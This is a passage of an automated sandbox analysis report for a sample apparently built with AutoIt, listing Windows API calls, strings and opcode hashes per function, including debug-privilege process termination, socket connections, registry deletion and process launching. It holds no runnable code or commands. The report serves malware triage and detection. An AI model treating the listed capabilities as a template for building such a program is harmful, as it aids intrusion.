                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                            • String ID:
                            • API String ID: 793581249-0
                            • Opcode ID: e6ec62147ad1055c1f7a9b6ca0eedd22b3a9c15d9b5cfd00ddfeda5e70059d1b
                            • Instruction ID: 4536b3093c7f206bd6564f8a9e7c61a474de020e09005d2add28bf980101375c
                            • Opcode Fuzzy Hash: e6ec62147ad1055c1f7a9b6ca0eedd22b3a9c15d9b5cfd00ddfeda5e70059d1b
                            • Instruction Fuzzy Hash: 245152B21083959BC725DBA0D8819DBB3ECEFC5350F40092FF685D7151EE35A588CB6A
                            APIs
                            • LoadImageW.USER32 ref: 003FC2F7
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FC319
                            • LoadImageW.USER32 ref: 003FC331
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FC34F
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FC370
                            • DestroyIcon.USER32(00000000), ref: 003FC37F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FC39C
                            • DestroyIcon.USER32(?), ref: 003FC3AB
                              • Part of subcall function 0044A4AF: DeleteObject.GDI32(00000000), ref: 0044A4E8
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                            • String ID:
                            • API String ID: 2819616528-0
                            APIs
                              • Part of subcall function 0041A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A84C
                              • Part of subcall function 0041A82C: GetCurrentThreadId.KERNEL32(00000000,?,00419683,?,00000001), ref: 0041A853
                              • Part of subcall function 0041A82C: AttachThreadInput.USER32(00000000,?,00419683), ref: 0041A85A
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0041968E
                            • PostMessageW.USER32 ref: 004196AB
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004196AE
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 004196B7
                            • PostMessageW.USER32 ref: 004196D5
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004196D8
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 004196E1
                            • PostMessageW.USER32 ref: 004196F8
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004196FB
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0041853C,00000B00,?,?), ref: 0041892A
                            • HeapAlloc.KERNEL32(00000000,?,0041853C,00000B00,?,?), ref: 00418931
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0041853C,00000B00,?,?), ref: 00418946
                            • GetCurrentProcess.KERNEL32(?,00000000,?,0041853C,00000B00,?,?), ref: 0041894E
                            • DuplicateHandle.KERNEL32 ref: 00418951
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0041853C,00000B00,?,?), ref: 00418961
                            • GetCurrentProcess.KERNEL32(0041853C,00000000,?,0041853C,00000B00,?,?), ref: 00418969
                            • DuplicateHandle.KERNEL32 ref: 0041896C
                            • CreateThread.KERNEL32(00000000,00000000,00418992,00000000,00000000,00000000), ref: 00418986
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            APIs
                              • Part of subcall function 0041710A: CLSIDFromProgID.OLE32 ref: 00417127
                              • Part of subcall function 0041710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00417142
                              • Part of subcall function 0041710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00417044,80070057,?,?), ref: 00417150
                              • Part of subcall function 0041710A: CoTaskMemFree.OLE32(00000000), ref: 00417160
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00439806
                            • _memset.LIBCMT ref: 00439813
                            • _memset.LIBCMT ref: 00439956
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00439982
                            • CoTaskMemFree.OLE32(?), ref: 0043998D
                            Strings
                            • NULL Pointer assignment, xrefs: 004399DB
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00446E24
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00446E38
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00446E52
                            • _wcscat.LIBCMT ref: 00446EAD
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00446EC4
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00446EF2
                            Strings
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            APIs
                              • Part of subcall function 00423C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00423C7A
                              • Part of subcall function 00423C55: Process32FirstW.KERNEL32(00000000,?), ref: 00423C88
                              • Part of subcall function 00423C55: CloseHandle.KERNEL32(00000000), ref: 00423D52
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043E9A4
                            • GetLastError.KERNEL32 ref: 0043E9B7
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043E9E6
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043EA63
                            • GetLastError.KERNEL32(00000000), ref: 0043EA6E
                            • CloseHandle.KERNEL32(00000000), ref: 0043EAA3
                            Strings
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            APIs
                            Strings
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert_memset
                            • String ID: 0$`$
                            • API String ID: 3866635326-1801689331
                            APIs
                            Strings
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00424312
                            • LoadStringW.USER32(00000000), ref: 00424319
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0042432F
                            • LoadStringW.USER32(00000000), ref: 00424336
                            • _wprintf.LIBCMT ref: 0042435C
                            • MessageBoxW.USER32 ref: 0042437A
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 00424357
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            APIs
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 003C2ACF
                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C2B17
                            • ShowWindow.USER32(FFFFFFFF,00000006), ref: 003FC21A
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 003FC286
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 004270DD
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00427114
                            • EnterCriticalSection.KERNEL32(?), ref: 00427130
                            • _memmove.LIBCMT ref: 0042717E
                            • _memmove.LIBCMT ref: 0042719B
                            • LeaveCriticalSection.KERNEL32(?), ref: 004271AA
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004271BF
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 004271DE
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 004461EB
                            • GetDC.USER32(00000000), ref: 004461F3
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0044902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 004461FE
                            • ReleaseDC.USER32(00000000,00000000), ref: 0044620A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00446246
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00446257
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00446291
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004462B1
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • _wcstok.LIBCMT ref: 0042EC94
                            • _wcscpy.LIBCMT ref: 0042ED23
                            • _memset.LIBCMT ref: 0042ED56
                            Strings
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: b7833cbe4afb2c33c07b995f144b48ea07171cc505d596b10b0d3f607d5a17b5
                            • Instruction ID: 1deaadeb87e9b67576eb74b6fcb59ed61ada6b76e57d2067d8c90a9b5255e7ad
                            • Opcode Fuzzy Hash: b7833cbe4afb2c33c07b995f144b48ea07171cc505d596b10b0d3f607d5a17b5
                            • Instruction Fuzzy Hash: EEC19A716083119FC715EF25D885F5AB7E0AF85310F41492EF899DB2A2DB70EC45CB86
                            APIs
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00436C00
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00436C21
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436C34
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00436CEA
                            • inet_ntoa.WSOCK32(?), ref: 00436CA7
                              • Part of subcall function 0041A7E9: _strlen.LIBCMT ref: 0041A7F3
                              • Part of subcall function 0041A7E9: _memmove.LIBCMT ref: 0041A815
                            • _strlen.LIBCMT ref: 00436D44
                            • _memmove.LIBCMT ref: 00436DAD
                            Similarity
                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                            • String ID:
                            • API String ID: 3619996494-0
                            • Opcode ID: 5fb84208df940f14f6aa2f08e72ff5b23941ceec70b18f7a507797537e297a81
                            • Instruction ID: ff011f3dbcce5fd33b26d8321b6d5526293cb24ef81303c4cc40260f48c944de
                            • Opcode Fuzzy Hash: 5fb84208df940f14f6aa2f08e72ff5b23941ceec70b18f7a507797537e297a81
                            • Instruction Fuzzy Hash: AE81EF71204201BBC711EB24CC86F6BB7A8AF88714F11892EF955DB2D2DB74ED05CB56
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42305d86b4bc71a75ffa1f90b1420ed3aa762c7f400caf1a5d825a7ebb50548a
                            • Instruction ID: a76a6fde5fa5d690af72cde340d6af2b3401bd9e082c413485616fafacfb2b83
                            • Opcode Fuzzy Hash: 42305d86b4bc71a75ffa1f90b1420ed3aa762c7f400caf1a5d825a7ebb50548a
                            • Instruction Fuzzy Hash: FE718974900109EFCB069F99CC49EBEBB78FF86314F208159F915EA252C734AE11DBA4
                            APIs
                            • _memset.LIBCMT ref: 0043F448
                            • _memset.LIBCMT ref: 0043F511
                            • ShellExecuteExW.SHELL32(?), ref: 0043F556
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • GetProcessId.KERNEL32(00000000), ref: 0043F5CD
                            • CloseHandle.KERNEL32(00000000), ref: 0043F5FC
                            Strings
                            Similarity
                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 3522835683-2766056989
                            • Opcode ID: 9ec2929c5ba2d5204993bde70ed3862c6e04a521baa47ced5fcc99fc96267055
                            • Instruction ID: fb6b0d5c1adfaff008a0a0dfd849dc37cc069901e961cf48440e0f0a57b8652e
                            • Opcode Fuzzy Hash: 9ec2929c5ba2d5204993bde70ed3862c6e04a521baa47ced5fcc99fc96267055
                            • Instruction Fuzzy Hash: AB619A75E006199FCB05DFA4C885AAEBBF5FF4D310F15806AE81AAB351CB34AD45CB84
                            APIs
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: cd8337840daf33ca42c3b8f32427fbba988890bc26b9072a940de9abb2531fb6
                            • Instruction ID: 955f22244a1e9c16ccadee29ef00f9f96894341b9c42a9b8faf72b6dd4889dbf
                            • Opcode Fuzzy Hash: cd8337840daf33ca42c3b8f32427fbba988890bc26b9072a940de9abb2531fb6
                            • Instruction Fuzzy Hash: 515122607447E53DFB3642349C05BB7BEE95B06304F48858AE1C4869E3C2ECACD9D769
                            APIs
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 28ad8bb96e833879d218e1b7ce6f986f04e2ae5bb678641206322bca894fdc32
                            • Instruction ID: 91d8c636a202b5490407c466573d4d38e3f0451e76eb04f7afee544499d214b7
                            • Opcode Fuzzy Hash: 28ad8bb96e833879d218e1b7ce6f986f04e2ae5bb678641206322bca894fdc32
                            • Instruction Fuzzy Hash: C451F3A07546E57DFB3283249C45B7BBEE96F06300F48888AF1D4569C3C399ACC8D768
                            APIs
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: df90c98866ed92fc670395fd28351bd5cb37a371afd5b243dbc1f4a85c506744
                            • Instruction ID: 795e222376d4e0592780ad7b80e992238429daa17fb24fcbdd3bd04119bf7a71
                            • Opcode Fuzzy Hash: df90c98866ed92fc670395fd28351bd5cb37a371afd5b243dbc1f4a85c506744
                            • Instruction Fuzzy Hash: B441F965C1026876CB12EBF58C4A9CFB3BC9F05300F404A66E508E7261FB34E745C7AA
                            Strings
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: 95c3486cac56f8e17cc75c0721320fddfb343d7bfc67d3a9d2007d11d43ce83a
                            • Instruction ID: e7db96231999c65a7434480fc675631ae61c7772d41f33e9d5ed0f7ee55ea1af
                            • Opcode Fuzzy Hash: 95c3486cac56f8e17cc75c0721320fddfb343d7bfc67d3a9d2007d11d43ce83a
                            • Instruction Fuzzy Hash: 0441E639984114AFE720DF28CC48FAABBA8EB09310F154167F815A73E1C7389D65DB5A
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0041D5D4
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0041D60A
                            • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0041D61B
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0041D69D
                            Strings
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: ,,E$DllGetClassObject
                            • API String ID: 753597075-2224467221
                            • Opcode ID: 3ae6b55fe1f31eee9c756c92a85ab37eb35603826eff88bacfb251f8ae3e1180
                            • Instruction ID: 8b7b7f8114ca382eea97dcb08d38b22572a08b9fa216a8e3f4515232e3acfab6
                            • Opcode Fuzzy Hash: 3ae6b55fe1f31eee9c756c92a85ab37eb35603826eff88bacfb251f8ae3e1180
                            • Instruction Fuzzy Hash: 15417DF1A00204EFDB05DF54C884BDA7BA9EF44314B1581AAEC099F209D7B9DD84CBA8
                            APIs
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00423697,?), ref: 0042468B
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00423697,?), ref: 004246A4
                            • lstrcmpiW.KERNEL32(?,?), ref: 004236B7
                            • _wcscmp.LIBCMT ref: 004236D3
                            • MoveFileW.KERNEL32 ref: 004236EB
                            • _wcscat.LIBCMT ref: 00423733
                            • SHFileOperationW.SHELL32(?), ref: 0042379F
                            Strings
                            Similarity
                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 1377345388-1173974218
                            • Opcode ID: 61458f4c924f1e37f2ed116ab06a25f077771f2f6f88454dba87480b2dbb5b35
                            • Instruction ID: b402e5c2405dff5503028aa5b030f109c2c75d44c0774de64f0bdbffcf176dce
                            • Opcode Fuzzy Hash: 61458f4c924f1e37f2ed116ab06a25f077771f2f6f88454dba87480b2dbb5b35
                            • Instruction Fuzzy Hash: 77419071208354AAC752EF60D441ADFB7ECEF89340F50092FB48AC7251EA38D689875A
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00440FD4
                            • RegOpenKeyExW.ADVAPI32 ref: 00440FFE
                            • FreeLibrary.KERNEL32(00000000), ref: 004410B5
                              • Part of subcall function 00440FA5: RegCloseKey.ADVAPI32(?), ref: 0044101B
                              • Part of subcall function 00440FA5: FreeLibrary.KERNEL32(?), ref: 0044106D
                              • Part of subcall function 00440FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441090
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441058
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 2ac7a3a661a3af14880679db2f443f7147c6988275b238f35ced2b67262df8d0
                            • Instruction ID: 547f57948c4dc300fd6615d2b319e90501006a213603bcad2fd4ccfaadf75b82
                            • Opcode Fuzzy Hash: 2ac7a3a661a3af14880679db2f443f7147c6988275b238f35ced2b67262df8d0
                            • Instruction Fuzzy Hash: 09312D75901109BFEB15DF90DC89EFFB7BCEF09340F00017AE501A2651EB759E899AA8
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DB2E
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DB54
                            • SysAllocString.OLEAUT32(00000000), ref: 0041DB57
                            • SysAllocString.OLEAUT32(?), ref: 0041DB75
                            • SysFreeString.OLEAUT32(?), ref: 0041DB7E
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0041DBA3
                            • SysAllocString.OLEAUT32(?), ref: 0041DBB1
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: c18047b32fc8df47fac814441dde9f4f093076567df6498faa002eee4de62216
                            • Instruction ID: e9ec91a6541ae4638ee2802d500816861ddc53bd01d767a982662d4976ff13e3
                            • Opcode Fuzzy Hash: c18047b32fc8df47fac814441dde9f4f093076567df6498faa002eee4de62216
                            • Instruction Fuzzy Hash: A8218376A04219AF9F10DFA9DC88CFB73ACEF09360B018536F915DB250DA74AD858768
                            APIs
                              • Part of subcall function 00437D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00437DB6
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004361C6
                            • WSAGetLastError.WSOCK32(00000000), ref: 004361D5
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0043620E
                            • connect.WSOCK32(00000000,?,00000010), ref: 00436217
                            • WSAGetLastError.WSOCK32 ref: 00436221
                            • closesocket.WSOCK32(00000000), ref: 0043624A
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436263
                            Similarity
                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 910771015-0
                            • Opcode ID: 04f60b4e24d025b233096dca3aa443d2a2c7d5fd28ea9e49a93184be22b99314
                            • Instruction ID: 636d31fa77eb0982b7cd35a9ae785afc42f34515d3ea3bcb98ba72a9f871296f
                            • Opcode Fuzzy Hash: 04f60b4e24d025b233096dca3aa443d2a2c7d5fd28ea9e49a93184be22b99314
                            • Instruction Fuzzy Hash: BD31C435600104AFDF10AF64CC85FBE7BA9EB49724F06806AFD05DB291CB78AC048B65
                            APIs
                            Strings
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: b1031fee15e11b2cdfa22993faa6fe9099f5097da2c6f0e9b03332ebd88c1c8d
                            • Instruction ID: 99c3c6b1d4aaac613b907e73994f3066bee8b3cc90c38a73ca7fb409bf756e06
                            • Opcode Fuzzy Hash: b1031fee15e11b2cdfa22993faa6fe9099f5097da2c6f0e9b03332ebd88c1c8d
                            • Instruction Fuzzy Hash: 3B213A7214466166D221A635AC03FE77398DF56340F60403BF8568B1D1EB985DCBC39D
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DC09
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DC2F
                            • SysAllocString.OLEAUT32(00000000), ref: 0041DC32
                            • SysAllocString.OLEAUT32 ref: 0041DC53
                            • SysFreeString.OLEAUT32 ref: 0041DC5C
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0041DC76
                            • SysAllocString.OLEAUT32(?), ref: 0041DC84
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: a934ed9ca811c20e405fc5b42c514a8fd4d2a333082774348d3a8b1b0ab5b45e
                            • Instruction ID: fdfba75f25f8ab8de9c515ed88f1eb87ffac7d0ef5dd572e02d3f18bd00233d7
                            • Opcode Fuzzy Hash: a934ed9ca811c20e405fc5b42c514a8fd4d2a333082774348d3a8b1b0ab5b45e
                            • Instruction Fuzzy Hash: 5C215875604114AF9B10DFA8DC89DEB77ECEB09360B108536F915CB261EAB4DC85C7A8
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00447632
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044763F
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044764A
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00447659
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00447665
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            APIs
                            • __init_pointers.LIBCMT ref: 003E9AE6
                              • Part of subcall function 003E3187: RtlEncodePointer.NTDLL(00000000), ref: 003E318A
                              • Part of subcall function 003E3187: __initp_misc_winsig.LIBCMT ref: 003E31A5
                              • Part of subcall function 003E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003E9EA0
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003E9EB4
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003E9EC7
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003E9EDA
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003E9EED
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003E9F00
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003E9F13
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003E9F26
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003E9F39
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003E9F4C
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003E9F5F
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003E9F72
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003E9F85
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003E9F98
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003E9FAB
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003E9FBE
                            • __mtinitlocks.LIBCMT ref: 003E9AEB
                            • __mtterm.LIBCMT ref: 003E9AF4
                              • Part of subcall function 003E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003E9AF9,003E7CD0,0047A0B8,00000014), ref: 003E9C56
                              • Part of subcall function 003E9B5C: _free.LIBCMT ref: 003E9C5D
                              • Part of subcall function 003E9B5C: DeleteCriticalSection.KERNEL32(02H,?,?,003E9AF9,003E7CD0,0047A0B8,00000014), ref: 003E9C7F
                            • __calloc_crt.LIBCMT ref: 003E9B19
                            • __initptd.LIBCMT ref: 003E9B3B
                            • GetCurrentThreadId.KERNEL32(003E7CD0,0047A0B8,00000014), ref: 003E9B42
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            APIs
                            • _memset.LIBCMT ref: 0044B644
                            • _memset.LIBCMT ref: 0044B653
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00486F20,00486F64), ref: 0044B682
                            • CloseHandle.KERNEL32 ref: 0044B694
                            Strings
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID: oH$doH
                            • API String ID: 3277943733-958180794
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003E3F85), ref: 003E4085
                            • GetProcAddress.KERNEL32(00000000), ref: 003E408C
                            • EncodePointer.KERNEL32(00000000), ref: 003E4097
                            • DecodePointer.KERNEL32(003E3F85), ref: 003E40B2
                            Strings
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 3489934621-2819208100
                            APIs
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004402BD
                            • RegOpenKeyExW.ADVAPI32 ref: 004402FD
                            • RegCloseKey.ADVAPI32(?), ref: 00440320
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00440349
                            • RegCloseKey.ADVAPI32(?), ref: 0044038C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440399
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            APIs
                            • GetMenu.USER32(?,00000001,00000000), ref: 004457FB
                            • GetMenuItemCount.USER32(00000000), ref: 00445832
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0044585A
                            • GetMenuItemID.USER32(?,?), ref: 004458C9
                            • GetSubMenu.USER32(?,?), ref: 004458D7
                            • PostMessageW.USER32 ref: 00445928
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            APIs
